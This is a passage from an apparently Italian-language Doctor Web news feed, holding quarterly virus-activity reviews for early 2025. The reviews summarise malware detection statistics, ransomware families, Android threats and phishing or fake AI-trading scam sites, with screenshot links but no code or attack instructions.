    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Un altro sito consigliava di investire €250 e guadagnare quotidianamente €700:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/23_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/23_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Una delle risorse fraudolente prometteva agli utenti polacchi "la possibilità di lavorare da casa e guadagnare una somma decente" 
    grazie al sistema automatizzato Click Money. Tramite di esso le persone senza esperienza di trading presumibilmente sarebbero in 
    grado di ottenere fino ai 64.000.000 di zloty polacchi all'anno:
  &lt;/p&gt;
  &lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/24_q2_2025_fraud.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/july/review_common_q2/24_q2_2025_fraud.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;div class="notrecommend"&gt;&lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Scopri di più sui siti sconsigliati da Dr.Web&lt;/a&gt;&lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="formobile"&gt;
    &lt;h3&gt;Software malevoli e indesiderati per dispositivi mobili&lt;/h3&gt;
    &lt;p&gt;
        Secondo le statistiche di rilevamento di Dr.Web Security Space per dispositivi mobili, 
        nel II trimestre 2025 i rilevamenti più frequenti sui dispositivi protetti sono stati i trojan pubblicitari 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. Rispetto al trimestre precedente, gli utenti li riscontravano leggermente meno spesso. 
        Sono seguiti dai trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; e i programmi malevoli falsificazione 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;. L'attività dei primi è aumentata, mentre quella dei secondi è diminuita.
    &lt;/p&gt;
    &lt;p&gt;
        Anche tra i trojan bancari si osservava una dinamica contrastante. Ad esempio, sono stati registrati più attacchi 
        da parte dei campioni della famiglia &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Allo stesso tempo, i trojan delle famiglie &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; 
        e &lt;b&gt;Android.SpyMax&lt;/b&gt; venivano rilevati meno spesso sui dispositivi protetti.
    &lt;/p&gt;
    &lt;p&gt;
        Nel II trimestre nei firmware di una serie di modelli di smartphone Android gli specialisti dell'azienda Doctor Web 
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15002" target="_blank"&gt;hanno rilevato&lt;/a&gt; un trojan &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;. 
        Questo programma malevola era nascosto in una versione modificata dai malintenzionati dell'app di messaggistica WhatsApp e veniva 
        utilizzato per rubare criptovalute ai proprietari dei dispositivi infetti. Inoltre, i nostri analisti dei virus 
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=15006" target="_blank"&gt;hanno scoperto&lt;/a&gt; 
        un programma malevolo &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;. I cybercriminali lo avevano inserito in una delle versioni del software 
        cartografico Alpine Quest e tramite di esso spiavano militari russi.
    &lt;/p&gt;
    &lt;p&gt;
        Negli ultimi 3 mesi decine di minacce sono state rilevate sullo store di app Google Play. Tra queste erano programmi falsificazione 
        &lt;a href="https://vms.drweb-av.it/search/?q=Android.FakeApp&amp;lng=it"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; e un nuovo software pubblicitario indesiderato &lt;b&gt;Adware.Adpush.21912&lt;/b&gt;.
    &lt;/p&gt;
    &lt;p&gt;
        Eventi più importanti relativi alla sicurezza "mobile" in II trimestre:
    &lt;/p&gt;
    &lt;ul&gt;
        &lt;li&gt;Calo dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.HiddenAds&amp;lng=it"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Crescita dell'attività dei trojan pubblicitari &lt;a href="https://vms.drweb-av.it/search/?q=Android.MobiDash&amp;lng=it"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Più frequenti i casi di rilevamento dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.Banker&amp;lng=it"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
        &lt;li&gt;Calo del numero di attacchi dei trojan bancari &lt;a href="https://vms.drweb-av.it/search/?q=Android.BankBot&amp;lng=it"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; e &lt;b&gt;Android.SpyMax&lt;/b&gt;&lt;/li&gt;
        &lt;li&gt;Rilevamento di un trojan per il furto di criptovalute nascosto nei firmware di una serie di smartphone Android&lt;/li&gt;
        &lt;li&gt;Rilevamento di un trojan spia mirato a militari russi&lt;/li&gt;
        &lt;li&gt;Comparsa di nuove minacce sullo store di app Google Play&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;
      Per maggiori informazioni sulla situazione di virus per dispositivi mobili nel II trimestre 2025 leggete la nostra &lt;a href="" target="_blank"&gt;panoramica&lt;/a&gt;.
    &lt;/p&gt;
&lt;/section&gt;

</description></item><item><guid>https://news.drweb-av.it/show/?i=14992&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus in I trimestre 2025</title><link>https://news.drweb-av.it/show/?i=14992&amp;lng=it&amp;c=9</link><pubDate>Thu, 27 Mar 2025 00:00:00 GMT</pubDate><description>



&lt;p&gt;&lt;b&gt;27 marzo 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
  &lt;p&gt;&lt;newslead&gt;Secondo le statistiche di rilevamento dell'antivirus Dr.Web, nel I trimestre 2025 il numero totale di minacce rilevate è aumentato del 7,23% rispetto al IV trimestre 2024. Allo stesso tempo, il numero di minacce uniche è diminuito di quasi un terzo — del 27,59%. Questo suggerisce che i malintenzionati, aumentando leggermente l'intensità degli attacchi, più spesso utilizzavano in essi gli stessi programmi malevoli e indesiderati. I più diffusi sono stati gli script malevoli con varie funzionalità, nonché i trojan pubblicitari e i software pubblicitari.&lt;/newslead&gt;&lt;/p&gt;
  &lt;p&gt;
    Nel traffico email il più frequentemente venivano rilevati i trojan dropper e downloader, i software pubblicitari, gli script malevoli, nonché i trojan progettati per l'avvio di varie minacce su computer attaccati.
  &lt;/p&gt;
  &lt;p&gt;
    Gli utenti i cui file sono stati colpiti dai trojan ransomware di criptazione dovevano affrontare il più spesso 
    &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; e &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;.
  &lt;/p&gt;
  &lt;p&gt;
    A gennaio il laboratorio dei virus Doctor Web 
    &lt;a href="https://news.drweb-av.it/show/?i=14976&amp;lng=it" target="_blank" rel="noopener noreferrer"&gt;ha individuato&lt;/a&gt; 
    un'attiva campagna di mining della criptovaluta Monero, organizzata con l'impiego di molteplici vari programmi malevoli. 
    Per mascherare alcuni di essi, i malintenzionati facevano uso della steganografia — una tecnica che consente di celare dati tra altri dati, ad esempio, all'intero di immagini.
  &lt;/p&gt;
  &lt;p&gt;
    Contemporaneamente durante il primo trimestre, i nostri analisti internet registravano un aumento del numero di siti truffa mirati a rubare 
    gli account utenti del servizio di messaggistica Telegram.
  &lt;/p&gt;
  &lt;p&gt;
    Nel segmento delle minacce alla sicurezza mobile, si osservava un aumento dell'attività dei trojan pubblicitari e di alcune famiglie di trojan bancari 
    per sistema operativo Android. Inoltre, gli specialisti dell'azienda Doctor Web hanno scoperto decine di nuove applicazioni malevole sullo store di app Google Play.
  &lt;/p&gt;
  &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
    &lt;h4 class="white alignCenter"&gt;Principali tendenze di I trimestre&lt;/h4&gt;
    &lt;ul&gt;
      &lt;li&gt;Cresciuto il numero di minacce rilevate su dispositivi protetti&lt;/li&gt;
      &lt;li&gt;Diminuito il numero di minacce uniche impiegate in attacchi&lt;/li&gt;
      &lt;li&gt;Aumentato il numero di siti di phishing creati per rubare account Telegram&lt;/li&gt;
      &lt;li&gt;Aumentata l'attività di alcuni diffuse famiglie di trojan pubblicitari e bancari per sistema operativo Android&lt;/li&gt;
      &lt;li&gt;Comparsa di nuovi programmi malevoli su Google Play&lt;/li&gt;
    &lt;/ul&gt;
  &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
  &lt;h2 class="alignCenter"&gt;Secondo i dati del servizio delle statistiche Doctor Web&lt;/h2&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/01_stat_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/01_stat_q1_2025_en.png" alt="stat_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;Minacce più diffuse di I trimestre 2025:&lt;/p&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di premuta del pulsante Escape chiudendole forzatamente ("разработчика" – rus. "di sviluppatore", "розробника" – ucr. "di sviluppatore").&lt;/dd&gt; 
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Adware utilizzato come installer intermedio di software pirata.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Processo host di un framework Electron modificato dai malintenzionati, che si mimetizza da componente dell'applicazione Steam (Steam Client WebHelper) e carica un backdoor JavaScript.&lt;/dd&gt;
  &lt;/dl&gt;
  &lt;h3 class="alignCenter"&gt;Statistiche delle applicazioni malevole nel traffico email&lt;/h3&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/02_mail_traffic_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/02_mail_traffic_q1_2025_en.png" alt="mail_traffic_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;dl class="dlList"&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Una famiglia di script malevoli, scritti nel linguaggio JavaScript. Incorporano uno script malevolo nel codice HTML di pagine web.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AVKill.63950&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Dropper che installa un backdoor denominato &lt;b&gt;JS.BackDoor.42&lt;/b&gt; su computer con sistema operativo Windows.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Inject5.13806&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma malevolo per computer con sistema operativo Windows, creato con l'uso del linguaggio di scripting AutoIt. Avvia diversi processi di sistema ed esegue l'injection in essi di un trojan spia, &lt;b&gt;Trojan.Fbng&lt;/b&gt;, il quale gli attaccanti possono utilizzare, tra l'altro, come trojan bancario.&lt;/dd&gt;
  &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
  &lt;h2 class="alignCenter"&gt;Ransomware di criptazione&lt;/h2&gt;
  &lt;p&gt;
    Nel I trimestre 2025, le richieste per la decriptazione di file interessati da trojan ransomware di criptazione sono state del 9,34% in meno rispetto al IV trimestre dell'anno scorso.
  &lt;/p&gt;
  &lt;p&gt;
    Dinamica del numero di richieste di decriptazione pervenute al servizio di supporto tecnico Doctor Web:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/03_encoder_requests_q1_2025_en.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/03_encoder_requests_q1_2025_en.png" alt="encoder_stat_2025_Q1"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;Ransomware di criptazione più diffusi di I trimestre 2025:&lt;/p&gt;
  &lt;ul&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 11,89% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.35209&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 5,95% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder. 35067&lt;/b&gt; — 3,57% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Encoder.38200&amp;lng=it"&gt;&lt;b&gt;Trojan.Encoder.38200&lt;/b&gt;&lt;/a&gt; — 2,38% di richieste utente&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.37369&lt;/b&gt; — 1,98% di richieste utente&lt;/li&gt;
  &lt;/ul&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
  &lt;h2 class="alignCenter"&gt;Frode online&lt;/h2&gt;
  &lt;p&gt;
    Nel primo trimestre 2025, gli analisti internet dell'azienda Doctor Web hanno notato la comparsa 
    di molteplici nuovi siti di phishing progettati per il furto degli account del servizio di messaggistica Telegram. 
    Tra le varianti frequenti c'erano false pagine di login e pagine di assistenza con una comunicazione di presunti 
    problemi che si sarebbero verificati a causa di una certa violazione delle condizioni di uso del servizio.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/04_scam_telegram_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/04_scam_telegram_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/05_scam_telegram_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/05_scam_telegram_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Di nuovo erano largamente presenti i siti di negozi online falsificati, su cui i malintenzionati suggerivano alle potenziali vittime di eseguire il login nel proprio account.
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/06_scam_onlinestore_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/06_scam_onlinestore_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Modulo login di phishing su un sito fittizio che imita uno dei negozi online russi
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    I nostri specialisti continuavano a registrare siti truffa con svariate "offerte vantaggiose", come, ad esempio, 
    l'accesso a un guadagno facile o rapido, l'ottenimento di certi regali, la partecipazione a promozioni ecc. Uno degli 
    schemi, ad esempio, era rivolto agli abitanti di Regno Unito. Loro venivano invitati a ricevere carte trasporti pubblici 
    di "un'edizione limitata", che presumibilmente sarebbero correlate all'anniversario di uno o altro operatore e consentirebbero 
    di utilizzare i servizi di trasporto pubblico gratuitamente per un lungo periodo.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/07_scam_transportcard_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/07_scam_transportcard_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/08_scam_transportcard_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/08_scam_transportcard_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Siti fraudolenti che offrono una chance di ottenere carte "promozionali" First Essex e Oyster per utilizzare gratis i mezzi di trasporto pubblico
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    Gli utenti dovevano rispondere ad alcune domande, e quindi giocare a un gioco aprendo scatole virtuali con regali (la "vincita" in tali scenari 
    è stabilita in anticipo). Dopo aver "vinto", dovevano fornire i propri dati personali e pagare £2 per "ricevere" la carta in questione. Le 
    informazioni personali e i soldi delle vittime andavano a finire nelle mani dei malintenzionati.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/09_transport_gift_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/09_transport_gift_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/10_transport_gift_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/10_transport_gift_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Potenziale vittima avrebbe scoperto con successo la carta in una delle scatole di gioco, e per riceverla, deve fornire i dati personali, nonché pagare £2
  &lt;/em&gt;&lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/11_transportcard_pay_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/11_transportcard_pay_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
    Modulo per l'inserimento dei dettagli di carta bancaria per pagare la carta trasporti promozionale inesistente
  &lt;/em&gt;&lt;/p&gt;
  &lt;p&gt;
    I malintenzionati continuano ad attirare le potenziali vittime con il pretesto di svariate piattaforme di trading con algoritmi "unici", 
    tra l'altro, presumibilmente basati sull'intelligenza artificiale. Per questo, i truffatori fanno uso dei nomi di famosi personaggi e si 
    coprono dietro vere aziende e servizi fingono di essere collegati ad essi. Uno degli scenari attuali rimane un'opportunità promessa di 
    guadagnare tramite certi servizi specializzati di Telegram, WhatsApp e altre aziende. 
  &lt;/p&gt;
  &lt;p&gt;
    Così, alcuni siti pubblicizzavano svariate piattaforme basate sull'IA, ad esempio, Telegram AI e WHATSAPP AI — presumibilmente esse potrebbero 
    portare da €14.000 al mese grazie all'uso di un "sistema di trading automatizzato":
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/12_scam_telegramai_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/12_scam_telegramai_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/13_scam_whatsappai_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/13_scam_whatsappai_q1_2025.PNG" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Altre varianti sfruttavano il tema dei bot di trading, i quali spesso vengono presentati come strumenti creati direttamente dai proprietari dei servizi 
    di messaggistica istantanea. Come esempio, uno dei siti prometteva che il "bot di Pavel Durov" Telegram.AI avrebbe consentito di guadagnare mensilmente da 
    €2500, mentre un altro sito, per ottenere fino a €500 al giorno, suggeriva di utilizzare WhatsApp Bot presumibilmente creato da Mark Zuckerberg.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/14_scam_telegrambot_q1_2025.PNG" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/14_scam_telegrambot_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/15_scam_whatsapbot_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/15_scam_whatsapbot_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Ancora un altro sito fraudolento invitava a registrarsi su una "piattaforma Telegram" che, come veniva affermato, funzionerebbe 
    direttamente dal browser dello smartphone, farebbe un trading automatico di azioni di aziende globali e porterebbe €10.000 al mese:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/16_scam_telegram_platform_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/16_scam_telegram_platform_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Un sito prometteva "a ogni abitante di Europa" un reddito mensile a partire da €5.000 tramite certi algoritmi dell'azienda WhatsApp basati sull'intelligenza artificiale:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/17_scam_whatsapp_platform_q1_2025__new.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/17_scam_whatsapp_platform_q1_2025__new.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Una diffusa variante dello schema di truffa del falso sistema di trading basato su IA è una piattaforma di scam chiamata "Formula bogatstva" (trad. da russ. 
    "Formula di ricchezza") che presumibilmente eseguirebbe le operazioni di trading in una frazione di secondo, inclusa l'analisi di un'enorme quantità di dati. 
    Gli svariati siti di questo sistema inesistente invitano i visitatori a guardare un filmato di informazione e registrarsi per la consulenza "nell'ufficio delle 
    soluzioni anticrisi". I malintenzionati sono interessati predominantemente agli utenti europei — in particolare, quelli cechi — cui promettono una redditività 
    di €1000 al giorno "durante tutta la vita". Per accedere al sistema, le potenziali vittime devono versare un deposito minimo di €250.
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/18_scam_formule_bohatstvi_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/18_scam_formule_bohatstvi_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/19_scam_formule_bohatstvi_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/19_scam_formule_bohatstvi_q1_2025.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Rimangono popolari anche altri scenari simili — ad esempio, la generazione di un reddito tramite uni o altri software specializzati. Così, 
    uno dei siti invitava gli utenti cechi a guadagnare decine di migliaia di corone al giorno grazie al "software crittografico più intelligente del mondo":
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/20_scam_cz_money_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/20_scam_cz_money_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Un altro portale fraudolento prometteva un guadagno mensile di oltre 4,7 milioni di corone in caso di utilizzo di un certo software di trading "10K EVERY DAY APP":
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/21_scam_10kapp_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/21_scam_10kapp_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Oltre a questo, gli utenti continuavano a imbattersi in siti fittizi a tema investimenti, il cui obiettivo sono abitanti di vari paesi. Ad esempio, 
    per il pubblico da Kazakistan i truffatori hanno preparato una nuova piattaforma per un reddito passivo tramite il trading sul petrolio e gas:
  &lt;/p&gt;
  &lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/22_scam_kaz_passive_q1_2025.png" class="preview"&gt;
      &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/22_scam_kaz_passive_q1_2025.png" alt="Net Fraud"&gt;
    &lt;/a&gt;
  &lt;/div&gt;
  &lt;p&gt;
    Molteplici altri siti suggerivano di "guadagnare il più possibile" con il trading su azioni da Kazakistan, Russia, Cina e altri stati:
  &lt;/p&gt;
  &lt;div class="flex fxCenter"&gt;
    &lt;div class="margRM"&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/23_scam_kaz_more_q1_2025.png" class="preview"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/23_scam_kaz_more_q1_2025.1.png" alt="Net Fraud" style="max-width: 350px;"&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div&gt;
      &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_common_q1/24_scam_kaz_more_q1_2025.png" class="preview"&gt;
